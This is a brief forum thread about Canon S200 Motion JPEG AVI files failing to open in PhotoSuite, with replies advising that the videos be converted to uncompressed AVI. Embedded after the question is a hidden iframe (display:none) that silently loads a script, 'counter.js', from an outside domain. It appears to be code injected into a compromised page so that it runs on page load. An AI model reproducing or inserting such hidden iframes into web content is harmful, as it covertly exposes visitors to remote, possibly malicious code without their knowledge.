    AVI won't convert

I have a Canon S200 digital still camera which records videos in .avi format (Motion JPEG for video and Wave for audio). When I try to used the PhotoSuite Mobile Organizer, they have an X on them. The manual for PhotoSuite says it could be I don't have the correct codec on the computer or it is 32-bit. How can get this to work?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

There are several different versions of avi. I don't know about Photosuite, but I've found that Tealmovie prefers UNCOMPRESSED avi's. Your motion JPEG is a form of compression. So that might be your problem.

I've solved that problem by running compressed AVI's through a computer program called MGI Videowave and saving them out again as uncompressed.

I have a Canon digital camcorder that records motion jpegs on the SD card. They won't convert unless I decompress them.
